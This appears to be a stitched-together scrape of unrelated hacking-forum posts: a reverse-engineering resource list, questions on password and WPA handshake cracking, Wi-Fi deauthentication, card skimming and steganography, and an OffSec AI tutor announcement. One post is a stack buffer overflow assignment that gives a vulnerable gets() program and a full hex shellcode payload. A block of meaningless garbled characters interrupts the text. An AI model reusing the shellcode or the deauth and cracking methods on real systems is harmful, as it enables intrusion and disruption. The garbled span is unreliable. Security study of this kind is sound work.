just curious for the reasoning
I always see questions on here about good starting resources. So here is a list that I've compiled from my browser bookmarks that I've found helpful in the past, mostly related to old Windows game hacking, so that when I see those questions I can link them back to here.
I kind of assume that you already have some level of programming experience and want to branch into hacking - if you don't then I'd recommend getting the hang of a programming language like C++ first, and especially learning how to use the Win32 API. You can find plenty of help with that elsewhere, so that's not a focus of this post.
If any of these links are not acceptable to post here for whatever reason then let me know and I can edit them out to leave the rest.
Tools
-
it may sound silly, but using Cheat Engine to hack games can teach you a lot of the basic concepts of debugging an executable at a little bit lower level.
-
this is a basic hex editor. You can use it to edit binary files, similar to how you would use a text editor to edit text files. It's split into two columns: a hexadecimal representation and a text representation (which shows what the file would look like interpreted as text.)
-
Some tips: HxD also has a built in memory viewer which you can use to view of memory of a process without needing to attach to it as a debugger, which is quite useful for searching for strings in protected executables that detect when a debugger is attached. You can also use HxD to open very large text files (GB's in size) instantly and without any lag, as long as you don't mind the lack of newlines!
-
-
you'll want to become deeply familiar with the Portable Executable (PE) file format used by Windows EXE and DLL files, and CFF Explorer allows you to poke around, view what the headers look like, and edit them. It even includes some more advanced utilities like an Import Adder, to add DLL imports to an executable.
-
or I mention both because they fill similar roles. They are static analysis tools which can be used to examine a compiled executable to get some guess of what the original source code sort of looked like, without needing to actually run the executable. Ghidra is free/open source and IDA is an expensive commercial software, each with their own features and tradeoffs. I see Ghidra being used more and more often but IDA is still definitely holding on.
-
or again, these are similar tools - x64dbg is meant to be a modern successor of sorts, but some hackers still swear on Ollydbg with plugins to iron out some of the bugs on newer Windows versions. These are dynamic analysis tools: you can actually run the code and step through it as it is running to see what it is doing, what values are in memory, in the CPU registers, and so on. Often times both static and dynamic analysis need to be combined to get a fuller picture and you'll need to learn which one is more useful for figuring out the thing you want to know.
-
because x64dbg allows you to see what a program is doing in great detail, it is in the best interest of malware creators to prevent you from using it and exposing how their program works. This is the world of "anti-debug" techniques: methods of discreetly detecting if a debugger is running, and either stopping or changing how the program operates if there is in order to hinder your progress. ScyllaHide attempts to make the debugger stealthier, in order to prevent the debugged program from finding out that you are investigating its inner workings.
-
a classic plugin for Ollydbg that fixes some of its bugs and provides more anti-debugging workarounds. A must have if you use Ollydbg.
-
a classic executable memory dumper. This is used to turn a currently running process back into an executable file. Why would you want to do this? Well, oftentimes programs will be "packed," meaning that the executable file for them is compressed or encrypted. By running the executable, it will decompress/decrypt itself, and then the process can be dumped in its uncompressed/unencrypted state, allowing you to more easily analyze the code within.
-
Of note: LordPE doesn't work very well on modern Windows versions, since the list of processes caps out at a small number (I think 50,) and it only works for 32-bit processes. I don't know of a better modern alternative though - I've tried some, but haven't found one that is reliable for 64-bit processes. Maybe someone in replies can tell me.
-
-
or import rebuilders. Much like with x64dbg and Ollydbg, Scylla is the modern, open source implementation, and ImpREC is the original classic. Windows programs use DLL libraries in order to interact with the system. For example, the MessageBoxA function in USER32.DLL allows a program to display the built in Windows message box with an icon and OK/Cancel buttons. Usually, programs have an Import Address Table (or IAT for short) which specifes which imports the program uses. However, a very common trick to make dumping a process (such as with LordPE) difficult is to intentionally forego the Import Table, instead using the GetProcAddress function to populate a "fake IAT." This means that when the process is dumped, the imports will be random pointers into non-existent memory. Scylla and ImpREC are import rebuilders, which search for such a fake IAT and attempt to build a real IAT from them.
-
allows you to see all the files and registry keys being accessed by a process. You can even right click on an entry to view the program's call stack when the file or registry key was accessed. This is great if you want a sort of overview or summary of what the process is doing if you don't know where to begin looking.
-
a profiler that can be used on processes even if you do not have symbols for the executable, to see where the most processing time is being spent.
-
allows you to see all HTTP (and HTTPS, with a bit of setup) requests being made by any running program on the current machine, including their headers and contents. Very useful if you want to find out why a program needs to connect online. There is also Wireshark for lower level network stuff (unpopular opinion: it lowkey it kind of sucks and I rarely use it)
-
for viewing and replacing executable resources. This tool is not generally useful for changing the behaviour of an executable, only aesthetic things like its icon and text strings, but it can still reveal useful information on occasion.
YouTube
-
great Cheat Engine tutorials. This is how I got started.
-
more Linux focused, but nonetheless essential. I watch every new video from this channel.
-
tutorials for x64dbg and Ollydbg.
-
focused on writing code for hacking Windows games.
-
exploits, network hacking stuff.
-
videogame reverse engineering explained in a simple, easily accessible way. He's also pretty funny.
-
IDA malware reverse engineering and debugger fundamentals, in a livestream format.
-
new, smaller channel, retro game hacking.
-
mostly focused on reversing obfuscated malware VBScript, JavaScript, Python scripts.
Links
-
Tuts4you:
-
Tuts4you Collection 2011:
-
Exetools:
-
Reversing Technology Network:
-
OpenRCE:
-
ARTeam Downloads:
-
PE Format:
-
Peering Inside the PE: A Tour of the Win32 Portable Executable File Format:
-
An In-Depth Look into the Win32 Portable Executable File Format:
-
An In-Depth Look into the Win32 Portable Executable File Format, Part 2:
-
PE.wiki:
-
What implications has the low alignment mode of a PE file:
-
Abusing undocumented features to spoof PE section headers:
-
PE Format Poster:
-
RVA and Import Table:
-
Iczelion Import Table Tutorial:
-
Iczelion Debug API Tutorial:
-
How Windows Debuggers Work:
-
What triggers RIP_EVENT:
-
A Crash Course on the Depths of Win32 Structured Exception Handling:
-
Custom SEH handler with /SAFESEH:
-
The "Ultimate" Anti-Debugging Reference by Peter Ferrie:
-
What Happens Before main():
-
Floating Points, PE headers and libcmt.lib:
-
Enigma Virtual Box:
-
How to find simple stuff:
-
Stephen Chapman Cheat Engine Tutorials:
-
Reversing Wannacry:
-
Anti-Debug Tricks:
-
LOLBAS:
-
Delcert:
-
The faker's guide to reading (x86) assembly language:
-
x86 Assembly Wikibooks:
-
Redundancy of x86 Machine Code:
-
Intel x86 JMP Quick Reference:
-
How To Write Your Own Packer by BigBoote:
-
ActiveMARK on Exetools:
-
ActiveMARK on XeNTaX:
-
Armadillo v3 + Debug Blocker:
-
Armadillo 3.70 with Import Elimination:
-
SafeDiscShim:
-
Themida Unlicense:
-
MagicMida:
-
deroko:
-
Luigi Auriemma:
-
Virtools Deobfuscator:
-
C++ STL Types:
-
Introduction to Reversing C++ Binaries:
-
Dumping Memory:
-
Block Cipher Structures Ranked:
-
Intercept Calls to DirectX with a Proxy DLL:
-
A More Complete DLL Injection Method Using CreateRemoteThread:
-
How to share a data segment in a DLL:
-
RegHide:
-
Smashing The Stack For Fun And Profit:
-
Mr. Exodia:
Before I begin, I'm not sure if this is the right place to ask this question, so I'll happily accept any better suggestions.
Long story shortened a bit, I have a Samsung tablet that I inherited which I have reason to believe was a retail display model. The model number is SM-T900, for reference. I have been trying to figure out how to connect it to my PC as a drawing tablet to use with Blender, but none of the apps that I've found so far that allow this are supported by the tablet. I found this questionable, as it seems like a pretty decent tablet that should be able to do it; my question is, is there hidden functionality in Samsung's display models that I can somehow unlock, or is this one simply not capable as a drawing tablet? Any information that could help would be greatly appreciated.
Can someone steal card info from physical card payment?
My family member was on holiday a few weeks ago and made a purchase in a local shop to where he was staying. He paid with his debit card and left. And he’s now saying that there’s been £3-5 taken out each day since, and £100 that was blocked by the bank. Surely this isn’t possible? Google didn’t come up with much no matter how I phrased it, just gave results for online stores.
I have reasons to be suspicious about his spending, so just wondering if it’s another cover up.
Edit: this was the UK, no credit card, paid with contactless. We don’t use swipe cards here.
i have an assignment for university and I am trying to experiment with buffer overflow. i have created a vulnerable c program that read with gets. I am using xdbg, Also I found in the stack the ebp position and I overflow buffer with A:\x41+shellcode+\x90:nop until ebp+4 position which is the return address of the function, and there I put the address of esp which points to the top of the stack which has some A:\x41 and then the shellcode bytes. My problem now is that I received C0000005 exception access violation. i am using Windows 10 I have disabled ASLR and DEP(bcdedit.exe /set nx AlwaysOff) also I gcc -fno-stack-protector -no-pie. Why my code no running any help?
code its dummy its this one:
#include <stdio.h>
#include <string.h>
void doit(void) {
char buf[397];
gets(buf);
}
int main(void) {
printf("So... The End...\n");
doit();
printf("or... maybe not?\n");
getchar();
return 0;
}
Here is the shellcode:
9090909090909090909090909090909090dacbd97424f45d29c9bac18f98bcb15983edfc315515035515237a64542c8595a5520f7094406bf08554ff54261fad4cbd6d7a6276db5c4d87ea60014b6d1d58984d1c93ed8c59659b6137fd316def8af4b10e5d738968d8447dc5e394f69dfb9f503efd4c30bb34068cf239ae67c04e30a11891f28256bdf4db515d8317a2e094ecd83e10f27bb482d67a19549d71d612f995e9f772a162f6542330dd706fe27c21d5458031b13a243a502c58c3aa510453669cb7a3e097c491af034399388a94a82f2d4a123fd36b6269103f3201b140d9d13e9577d8a8d62fdd4ebf2dde9b8cb838f3a2ea94b4124a455d7945ba7d828cd3146d788b8014214730d8fc2d7252f4d23d937dc12ac47d19ab617d73af232aebad121cb44e711fb3b10429cf849215a7e8729537bf18955f6779c67a68547bd7fd572d8b5630d3f2919f2cd1a1d8d2a78d40ba578e703a320e2152c921ce9232e887bab97d655bbd572bc5be54f0f6c51507f7393c6cf8394092c5ef79e0082c3efb3f1117963f0567b34141414141414141414141414174fd61
A few weeks ago, I heard that a company was "hacked" because attackers "ransomwared" the entire system. I don't have all the details, but it was quite nasty for the owners, and they had to pay to regain access. I don't fully understand how attackers can get away with it... a friend of mine told me they used cryptocurrencies and VPNs but didn't give me much more detail. Could you clarify this for me? I mean, is it 100% untrackable? How is it done?
Western Europe has them for every public wifi while in Eastern Europe you just connect to the wifi. I have a vague idea they protect against man-in-the-middle attacks but it's just something I read a long time ago.
Have you had any luck with cracking passwords with worlists?
I have tried several times and wordlists do not work for me. If it's a numerical password it's actually easier for me to bruteforce it, otherwise if it's a mixture of alphanumeric characters I have given up. Tried multiple times - wordlists no luck, and bruteforcing just is not reasonable in the sence that it can take years. The only time I had luck was when I used a mask and set up exactly the type of character and the length of the password, but this is not actually a real world scenario.
How would you go about it if you had to crack a handshake cap file with a mixture of alphanumeric characters?
癰癰ɠ 㐈湒鲎첼ⴝ伽煟鎁떣ퟅ裏ᰊ㸬恎 퀴픭謁ᡭ曬푨�㢕಼ꋨꔔ龵ﵖ呏촮贰歆덼퍄ᶴ骉꓆㿁㔘ٙ沙Ụఒ㸾बᒖ讫ࣿᯠ甌코沃代츞ₑ囙빉쬡�Ἣỏᢷ㤢㥀욤㻨Ǔೡ仂Ꮣ났菆碰瘈㨥ず쐢⊯T 퀴픧謈ᡪ暇퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ泩ẃఈ㸮ऻᒇ讠ࣱᯠ甈콏沍仇N 퀴픧謈ᡪ暇퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ泩ẃఈ㸮ऻᒇ讠ࣱᯠ甲P 퀴픧謈ᡪ暇퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮धᒃ讯࣫ᯱ甉콰V 퀴픧謈ᡪ暇퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮यᒆ讠ࣱᯩ甁콊沂仾츦x 퀴픮謉ᡭ暉퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮धᒂ讫࣫ᯱ留켊沕亻칋嚘븑쬯�ἨỚᢹ㤁㥄용㻲ǚೠv 퀴픮謊ᡩ暁퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮ठᒁ讠ࣱ᮰畈코泍亪츂⃀嚚빜쭱�ἮẄ㤊㥕웧㻰ǖR 퀴픮謊ᡩ暁퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮डᒇ讠ࣱᯣ甈콊沱R 퀴픮謊ᡩ暁퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮डᒇ讠ࣱᯣ甈콊沱T 퀴픮謊ᡩ暁퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮धᒀ议࣫ᯱ甉콏沌仇R 퀴픮謊ᡩ暁퐕�㣾ꋱꔋ龷﵋呒촺贠歁덱퍊ᶸ骋㿃㕥୩أ沭ẃఈ㸮डᒇ讠ࣱ
My router is dual band with the same SSID, meaning it automatically switches to whichever band is best for a device. When using Kismet, I can see two MAC addresses on two channels. However, when scanning with Airgeddon (using the same instance of Kali with the same hardware), only the 2.4GHz MAC is shown.
When testing and running Airgeddon on the visible network, it disconnects all my devices except those on the 5GHz channel. I tried manually running aireplay-ng using the 5GHz MAC as the target, but it tells me it's an invalid address.
Does anyone know the best way to approach this? Would I need 2 wireless NICs? One to run airgeddon on 2.4ghz and one to deauth 5ghz?
I have the hash of a password, I also know the password length is 12 digits, and that it's probably alphanumeric and not random.
What would be the optimal approach/parameters to cracking it with Hashcat?
We are excited to announce the launch of the OffSec KAI (OffSec Knowledge Artificial Intelligence)!
OffSec’s new mentoring and learner support AI bot. OffSec KAI is your own personal OffSec Mentor - designed to help you better understand OffSec’s learning material and “meet you where you are” in your learning journey.
KAI currently draws from the PEN-200 course learning modules (excluding module labs or challenge labs). While KAI has OffSec course knowledge, it is not the ultimate expert. Please remember to use KAI as guidance rather than the absolute truth. KAI is currently accessible to those with an active PEN-200 course via the OffSec Learning Library (OLL).
You can find KAI on the right sidebar within the PEN-200 learning modules. Guide video:
Please note:
-
If you prefer our Student Mentors, you may continue to leverage OffSec Discord or contact .
-
Always remember to avoid sharing personally identifiable information (PII) with KAI.
-
Any OffSec pricing or policies suggested by KAI must be validated by contacting , visiting the Help Center, or referencing the OffSec website.
-
KAI usage is governed by OffSec’s terms and conditions, academic, and privacy policies: .
-
KAI is not allowed during the OSCP exam. KAI will adhere to the OffSec Academic Policy, where hints and guidance on the OSCP exam are not allowed.
As KAI is in its early phase, your feedback is crucial for its continued improvement. Please share your experiences and thoughts on Discord
Let’s make KAI better together!
For more information on OffSec KAI and how it can help you, please visit OffSec KAI FAQ:
Happy Learning!
Hi everyone,
I’m interested in diving into the world of ethical hacking and would love to hear your recommendations for courses that are great for beginners. I’m looking for something that covers the basics and gradually progresses to more advanced topics. Ideally, the course should be well-structured, offer hands-on practice, and be recognized in the industry.
Has anyone taken a course that they found particularly effective? I’m especially interested in courses that provide certification or are endorsed by reputable organizations. Additionally, any tips on the skills I should focus on or resources for practice would be greatly appreciated!
Thanks in advance for your help!
So I made another post a couple days ago about an assignment I have for my ethical hacking class and I made some leeway in that assignment but after a while I've exhausted all the tools I have at my disposal, at least the ones that I know how to use and have moved on to another part of my assignment which is steganography. I have an image that supposedly has a hidden message. I've tried using exiftool, strings, DiiT, /stylesuxx.github.io/steganography/, , steghide, stegcracker (i currently have a python script running as I'm trying to brute force the passphrase since we weren't given one), and I just dont know where to go from here. I don't think I'm able to attach the actual image file here (or I'm just too sleep deprived to see it which is the most likely case). You guys were a massive help with the password cracking and I'm appreciate some more advice on this part of my assignment. Also incase your wondering I've asked my teacher for help multi times and her answer is always "Google it because thats all I'm going to do" just to give you some sort of idea as to what I'm working with, calling her a teacher is frankly far too generous.